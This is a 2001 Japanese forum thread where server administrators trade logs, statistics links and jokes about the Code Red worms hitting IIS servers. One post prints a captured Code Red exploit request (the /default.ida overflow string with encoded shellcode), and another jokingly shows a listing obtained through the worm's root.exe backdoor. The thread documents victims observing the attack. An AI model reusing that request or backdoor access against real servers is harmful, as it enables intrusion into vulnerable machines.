ワームが出てくると嬉しいんだけどな

>>798
当てになるかわからないけど某ウイルスサイトの今日付けのニュースに張って有った。
google、CodeRedIIIで検索すると一応引っかかるんだけど、詳細今一わからない。
＞誤認識って結論も有ったのね。。。

どうも、オランダで開催されたHAL 2001ってハッキングイベントに作者来てたんじ
ゃね−かって噂も書いてあった。29AってチームがボードにRedWormについてのメッ
セージ残してったらしい。

スマソ797のネタ元リンク貼れない。一度つぶれかけたとこだし。
バイナリファイルでもアップされれば比較できそうだけど。

まあ、何はともあれ、code redのおかげであぁ、世界は繋がってるんだ
と、実感できて良い事だ。

そろそろまとめの時期なのか？

IIS5でパッチを当ててあるのに
トレンドマイクロの駆除ツールに、CodeRedII発見！
と言われて不安な人は、とりあえず、
http://www.ipa.go.jp/security/ciadr/vul/checkcoderedII.html#infection
の確認をしてみたら安心出来るかもしれない。

あの・・なんか
http://www.security.nl/misc/codered-stats/
増えてるようにも見えげ。
「赤虫だもんそれくらいふつー」なのか？

>>799
地味なワームだからTVニュースでいい画が流せない、
結局もっと視聴率が取れるいい画が付いたゴミニュースしか流さんのが最近のマスコミ。

root.exe使った改竄の様子でも流せば数字取れそう

取りあえず最高のセキュリティ対策はM$を斬ることだね。

>>804 うを、久しぶりに見たらページがかっこよくなってんだけど

トレンドマイクロの駆除ツールって
こっそりバージョンアップしてるから気をつけたほうがいいよ。
初期のやつはヘタレでご認識しまくり

こんな時期に、全社一斉お盆休みとか言って、サポートも
一切受け付けず、まったりとしているプロバイダーなんか、
逝ってよし。

ユーザーじゃなくて、あんたんとこのサーバが、やられ
ちゃってるんだよ！！！

この盆はアレだな、鯖供養と赤虫供養の灯篭がぞろぞろ・・・

8/4以降まったく来てなかったNNN…が来たよー。
NNN付きのサーバってXXXには寄生されないの？

>>812
されます

そろそろ次スレの準備スレ。
ぱーと4か？

>>813
そうなのですか。

次スレの準備汁！！(やっと使えた)

>>812
XXXを送ってきた鯖(海外)をちょっと覗いたらNNNにも感染した形跡をみた事は幾度かあった。

>>816
次スレですか。
ラジャー。

緊急トラブルにて現在iモードより。
戦線離脱許可願う。
各自独断専行を許可する。

>>814
パート5じゃない？

>>819
ラジャー

>>811
ツクタヨ
http://www.nefty.net/desktop/haritsuke/img-box/img20010814095402.gif

＞え〜んさま
わ〜ん 感動だぁ〜〜

あそこの画像すぐ流れちゃうんダヨ
www.nefty.net/desktop/haritsuke/img-box/
今のうちヒロタホウガイイヨ

http://202.223.168.71/~shoichi/tateyama/2001/

>>823
ぜんぶ拾ってマスがな〜

>>824
なんじゃコリァ・・

これまでの減少傾向とはあきらかに違うグラフの動き
新種だろうか?
http://www.security.nl/misc/codered-stats/

www.tk.ac.kr[210.106.88.2]から送られて来てるんですが
どうしたらいいですかね？

XXXXXXXXXやNNNNNNNNNのCodeRedアクセスが
落ち着いたカナと思ったら今度は

203.246.81.170 - - [14/Aug/2001:05:42:19 +0900] "-" 408 -
203.239.134.29 - - [14/Aug/2001:06:10:24 +0900] "-" 408 -
203.67.241.128 - - [14/Aug/2001:06:38:14 +0900] "-" 408 -
203.248.129.50 - - [14/Aug/2001:06:56:09 +0900] "-" 408 -
203.73.165.36 - - [14/Aug/2001:07:08:03 +0900] "-" 408 -
203.144.224.240 - - [14/Aug/2001:07:10:54 +0900] "-" 408 -
203.241.197.125 - - [14/Aug/2001:07:44:04 +0900] "-" 408 -
203.239.58.193 - - [14/Aug/2001:10:17:01 +0900] "-" 408 -
203.224.27.176 - - [14/Aug/2001:10:19:56 +0900] "-" 408 -
203.227.37.239 - - [14/Aug/2001:10:21:53 +0900] "-" 408 -

なんですけど、これって何？

ｉｅ６ですがクッキーはどうすればｏｎになるのですか？

>>828
俺のとこは、２４時間前からほとんどそれだよ

>>830
そうっすか。
新種ですかね。

しかし、
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/redthree.asp
に関する続報って、ないのかいな？

日本語の情報で触れられているのはこれぐらいしか見つからないし。
どうなってんのよ。
http://www.zdnet.co.jp/enterprise/0108/10/01081002.html

一応サイト上にgifマトメタヨ
ちなみに、ディレクトリ探してもナニモデナイヨ
http://isweb24.infoseek.co.jp/computer/titikun/index.html

>>833
ページが見つかりません。
だとよ。

コンナン、ミツケタヨ
http://www3.airnet.ne.jp/codered/

>>835
既出

>>834
ふざけすぎた
１０秒待つか、右の青棒の中にリンクアルヨ

>>837
時々見かける手だね
ふざけてなんかいないよ。

>>837
え〜んさんは楽しい人だね。

>>837
センスは変だけどね。

>>840
ニヤリ

>>837
え〜んさん、ゴメンネ。ちゃんとありました。
ありがと。

>>841
　喜んでるし....

今回Win9X系が無害だったことは不幸中の幸いだな。
M$は今回の教訓を元にコンシューマ専用OSを絶対に作れ、全世界の管理者のために。

Win2kで9x系の統合に失敗して良かったね。

210.94.172.193 - - [13/Aug/2001:04:05:18 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271

210.244.220.131 - - [13/Aug/2001:04:14:39 +0900] "GET /default.ida?XXXXXXXX
210.117.4.11 - - [13/Aug/2001:04:15:39 +0900] "GET /default.ida?XXXXXXXXXX
210.205.242.251 - - [13/Aug/2001:04:21:53 +0900] "GET /default.ida?XXXXXXX
210.113.65.103 - - [13/Aug/2001:04:36:57 +0900] "GET /default.ida?XXXXXXXXXXX
210.241.251.58 - - [13/Aug/2001:04:39:58 +0900] "GET /default.ida?XXXXXXXXXX
210.124.29.200 - - [13/Aug/2001:04:40:21 +0900] "GET /default.ida?XXXXXXXXXX
210.91.196.69 - - [13/Aug/2001:04:44:46 +0900] "GET /default.ida?XXXXXXXXXX
210.91.108.101 - - [13/Aug/2001:04:49:38 +0900] "GET /default.ida?XXXXXXXXX
210.182.140.17 - - [13/Aug/2001:05:10:30 +0900] "GET /default.ida?XXXXXXXXXXX
210.225.48.83 - - [13/Aug/2001:18:16:32 +0900] "GET /default.ida?XXXXXXXX
210.99.213.5 - - [13/Aug/2001:18:38:00 +0900] "GET /default.ida?XXXXXXXXXXXX
210.181.198.227 - - [13/Aug/2001:18:38:56 +0900] "GET /default.ida?XXXXXX
210.125.198.67 - - [13/Aug/2001:18:39:39 +0900] "GET /default.ida?XXXXXXXXXXX
210.165.122.53 - - [13/Aug/2001:18:40:12 +0900] "GET /default.ida?XXXXXXXXXXX
210.106.188.215 - - [13/Aug/2001:18:43:01 +0900] "GET /default.ida?XXXXXXXX
210.178.122.139 - - [13/Aug/2001:18:48:10 +0900] "GET /default.ida?XXXXXXXXXX
210.178.122.139 - - [13/Aug/2001:18:48:11 +0900] "GET /default.ida?XXXXXXX
210.178.122.139 - - [13/Aug/2001:18:49:15 +0900] "GET /default.ida?XXXXXXXXXXX
210.124.169.120 - - [13/Aug/2001:19:02:13 +0900] "GET /default.ida?XXXXXXXXXX
210.90.239.200 - - [13/Aug/2001:19:02:30 +0900] "GET /default.ida?XXXXXXXXX
210.125.121.140 - - [13/Aug/2001:19:04:35 +0900] "GET /default.ida?XXXXXXX
210.183.245.243 - - [13/Aug/2001:20:44:31 +0900] "GET /default.ida?XXXXXXXXXXXX

えーん氏ギャラリー、髪金サン追加されてるし・・・

EVERYDAY PEOPLEさんは、うまいときに夏休みに入ったね

サイトはゲリラ的に更新
いまそれどころじゃないんだYO
メインPCイチャタヨ（サブノート使いづらい）
BIOSリセットも聞かない
しばらく倍茶

ユーザー認証突破してこんなの来た。
61.182.241.48 - - [14/Aug/2001:07:41:22 +0900] "X〜〜X ?????? HTTP/1.0" 400 178
なんなんだコイツは？

ちなみに今までのCodeRedだと
61.143.127.207 - - [14/Aug/2001:14:38:58 +0900] "GET /default.ida HTTP/1.0" 401 313
こんな感じ。

ときおり、おなじｉｐアドレスからXXXXの３０連発食らうんだが
これって変種なのか？それとも感染したIISの設定が変なのか？

複数の社内向けIISが感染して、そいつらがNAT通って外へクラックかけてるんじゃないの

推定台数１０台から３０台ってことか。

３２タテ食らう事もあるそーです。邪悪ねぇ。

いんたーりんくが、こんな事言ってるんですけど、、、
これって、オバカユーザの多さ、自分の無能さ、基幹の貧弱さを
暴露してるモード？

首相官邸へ提言　トロイの木馬型ウィルス「CodeRed」対策を求める
http://www.interlink.or.jp/notification/backno/2001/info012.html

うちも 20 連くらいのがあった。数秒間隔。

でもいくら NAT だからって、1 つの IP に揃ってリクエストっ
ていうのは、あり得ないような気がする。あれってランダムに
ターゲットの IP つくるんだよね。

Code Red の真似した別物とかって無いの？

逝ってよいよ？いんたーりんく。お盆だしね。ホネくらい拾ーてやる。（Ｗ

官邸へのSPAM依頼だね（笑）

自分のみは自分で守る。
出る時は厳密に、来る物には寛容に。
って言うインターネット文化はもう古典？

>>857
そんな風に期待するけど、タコNATだとあんまりランダムに振ってくれない
し、社内PROXYも利用してたりして。

え〜ん氏ダイジョブかな？

すげー素朴なこと書いてる気もしますが、
NAT router の中の IIS が感染した場合、そこから攻撃をばらまく先は
192.*.*.* になる、ということはないのでしょうか。

インターリンクって救い様の無いバカだな。

>>864
赤虫はニンゲンにも伝染るんですね。（ｗ

いんたーりんくは自分らの顧客の質が低いから何とかしてくれと
言いたいのか (w

>>863
６８０君お帰りぃ

http://www.interlink.or.jp/notification/backno/2001/info012.html
> 現在、当社は「コードレッドバスター」という機器を開発中です。これは外部からの 「CODE RED」を
> 除去する装置です。
CodeRedの裏口使って外部マシンを修正する機器だったりしてな。

>>856
．．．アホや。インターリンク。他国に対し技術支援だぁ？
元々安かろう悪かろうなプロバイダが何ゆーとるかね（笑）

あれでしょ、きっと「ナントカ銃」でクロスふぁいあ〜すると
赤虫が実体化するのでそこをみんなでボコると。

http://www.npa.go.jp/hightech/notice/notice.htm
ここは、M$ではありません。（ｗ

>>853
ああ、そうか思いつかなかった　サンクス
少なくともｋｒの２箇所から３０連発（以上）食らっているけど
ＬＡＮ内のサーバなら活動タイミングが（ほぼ）一致していても
不思議はないな


しかし、インターリンク面白過ぎ
＞ 現在、当社は「コードレッドバスター」という機器を開発中です。これは外部からの 「CODE RED」を
＞除去する装置です。

interlinkが戦争の火蓋を開くわけね。

開発が終わる頃にはCodeRedが沈静化する仕組みﾅﾘ。

>>871
もしホントにＭ＄なら：

その機能を検証した結果、
　　ア　　自己を他のサーバに複写しこれを繰り返す機能
　　イ　　バックドアを作成する機能
　　逝ク　そのまんまです
を有しており、ほっとけばなんとかなるので騒ぎすぎたらだめヨ。
なお数ヵ月後に大量のカッコーがわらわらと出て来るでしょうが
そんなの漏れたちの知ったこっちゃない。
いや〜今日もニホンは平和平和。あ、コイズミ君、かき氷ボクにも。（藁

すごいな〜interlink
入会せねば〜

>>862
心配してくれてアリガト・・バラシて掃除して組み立てたヨ
ヨカッタ新スレまでに間に合った。

インターリンクのバックドアをごにょごにょするのかな。
ちょっと興味あり。

掃除して直るパソっていったい・・・

そろそろ新スレかあ。
動きが無いからタイトルにも困るね。

あ、え〜んさん。無事でヨカタ

interlinkもニンマリ コードレッド（CodeRed）

コードレッド(code red)除去装置絶賛開発中 by Interlink
長いな。

コードレッド(code red)除去装置は間に合うのか？Code red自滅まであと一月半

コードレッド(Code Red)特需だ! by In(以下略)

interlink反省汁　コードレッド（Code Red）

もめろ！コート゛レッツ゛！！(CodeRed)

コードレッド感染汁（よくとぶぜ）

ところで…変な時間に…
しみじみ述べていいですか…

お盆休みが明日まで、という方も多いと思います。か
くいう私もそうですが、この休み中の課題（自宅鯖建
立）達成のため、なかなかここには来れませんでした
…というか、串経由（エッチチャットで自宅鯖のＩＰがで
るとヤなんで串さしてます）なんでここに入れてもら
えなかったんですけどね…

自宅鯖のhttpd-errorログにも、日に２、３０件は残って
ますね（FreeBSD鯖）…今日明日じゅうにＮＴ4.0でASP
鯖を立てる予定なんですが…不安です不安です不
安です…

そろそろこのねたもつきたんじゃあないですか。でも
今回の騒動で皆さん一番感じられたのは、どなたか
おっしゃってましたし既出ですが「インターネットが常
に世界とつながっているということの実感」なのでは
ないですか…

ああ、ＴＣＰ／ＩＰってオソロシイ…誰が作ったンダロウ…

だんだん洗練(?)されてきてる 1 だけど、いまだに index service
止めれば大丈夫とかほざくのがいたので、

「インデックスサービスを停止しても感染予防になりません」

の１行を次回 1 に加えるのきぼ〜ん。

早速/.に
http://slashdot.jp/article.pl?sid=01/08/14/0712213&mode=thread&threshold=

結局どうゆう仕組みなんだ？
コードレッドパスタ

>>891 ﾜﾗﾀ

1は

.∧＿∧　　／￣￣￣￣￣￣￣￣￣￣￣￣＼
（　´∀｀）＜　お前らまだやってんのかよ　　　|
.　　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿／

優良スレはまだまだ続く　 CodeRed スレ Part5.
ひょっとして 9/30 まで続くのか？
まもなく新しい亜種が登場する？ 基本はマターリでお願いします。

〓〓〓 WindowsNT4.0/2000 ユーザーはチェックしよう 〓〓〓
1.インデックスサービスを停止しても感染予防になりません
2.ログオンして Ctrl-Alt-Del を押す
3.「プロセス」タブを選択する
4.Inetinfo.exe プロセスを探す
5.見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
　　すぐに↓をチェック！
　http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742
さらに前↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662

リンク集は >>2

2はこう？

とりあえずここを読め！
Code Red (主にII) 関係のリンク

IPA：「Code Red ワームに関する情報」
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

マイクロソフト：対処方法
http://www.microsoft.com/japan/technet/security/codealrt.asp

橋本 喜代太氏：Code Red II についての警告
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

オランダでの観測と、東アジア爆発の中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

首相官邸へ提言　トロイの木馬型ウィルス「CodeRed」対策を求める
http://www.interlink.or.jp/notification/backno/2001/info012.html



何か抜けてるかチェックしてくれ

これも入れるのか？
http://isweb24.infoseek.co.jp/computer/titikun/CRhuri.htm

最後は晒し者か (w

>>895
みんなが気に入ってればいれるよろし

タイトルは？

899

なんせ機器だからな。コードレッドバストゥワー

タイトルどれかな？


881 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/14(火) 16:50
interlinkもニンマリ コードレッド（CodeRed）


882 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/14(火) 16:53
コードレッド(code red)除去装置絶賛開発中 by Interlink
長いな。


883 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/14(火) 16:54
コードレッド(code red)除去装置は間に合うのか？Code red自滅まであと一月半


884 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/14(火) 16:54
コードレッド(Code Red)特需だ! by In(以下略)


885 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/14(火) 16:56
interlink反省汁　コードレッド（Code Red）


886 名前：名無しさん＠お腹いっぱい。 投稿日：2001/08/14(火) 17:00
もめろ！コート゛レッツ゛！！(CodeRed)


887 名前：え〜ん 投稿日：2001/08/14(火) 17:01
コードレッド感染汁（よくとぶぜ）

アブね〜９０１ジャナイカヨ

>>887をもうちょっとﾋﾈﾙと良いかも

新スレ立て中？

９００さんスレ立てＯＫ？

>>903
漏れにはセンスナイ
だれかひねって

漏らすな！コードレッド感染汁（よくとぶぜ）

>>907
ワラタ

原点に戻って、
日本政府は反省しるコードレッド(code red)パート5

９００さんタイトル待ってるのかな

コードレッド(code red)パート5 日本政府は反省しる!

>>911
でいいんじゃない？

汁か、しる、の問題はあるけど

がんばれ900。

コードレッド(code red)パート5 日本政府は反省しる!

コードレッド(code red)パート5 日本政府は反省汁

どっち？
!

まちがった

コードレッド(code red)パート5 日本政府は反省しる!

コードレッド(code red)パート5 日本政府は反省汁 !

後者

後者やね

あとは９００さんにお・ま・か・せ

漏れも後者

もしも〜し　９００さん

立ててますか〜？

ここにいるの３人だけだったりして
>>917
>>918
漏れ

おれ917
もしかして900は書き逃げ？

やっぱり
９１７さん立てられる？

漏れかちゅーしゃなんよ

Directory of C:InetPubscripts
/script/root.exe?ほげほげするとこうなるようにしました
2001-06-13 12:42a <DIR> .
2001-06-13 12:42a <DIR> ..
2001-06-24 10:54p 289 eroero.asp
2001-06-24 10:54p 289 ero.htm
2001-06-24 10:54p 289 ero_img.asp
2000-08-26 12:00p 310,544 root.exe
2001-05-31 06:03p <DIR> アニメ_エロ
2001-05-31 06:03p <DIR> SM
2001-05-31 06:03p <DIR> 女子アナお宝画像
2001-05-31 06:03p <DIR> お宝画像
5 File(s) 311,700 bytes
4 Dir(s) 1,778,767,872 bytes free
エロファイル探してくる（ｗ

ROMならいるぞ。誰か立ててちょ。

ダブルとまたややっこしいからな

立てたよ

新スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

誰もいないの？
立てちゃうよ

>>928
もう勃ってるよ

新スレ
コードレッドパート5 日本政府は反省汁
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

スマソ

これにて終了
新スレはこちら
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

こちらはsageで

>>923 IPきぼーん

923さんＩＰ希望

新スレ
コードレッドパート5 日本政府は反省汁
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997783469

みんなまってるＹＯ

っつーか、結局Ｑちゃんはここ見たのだろうか？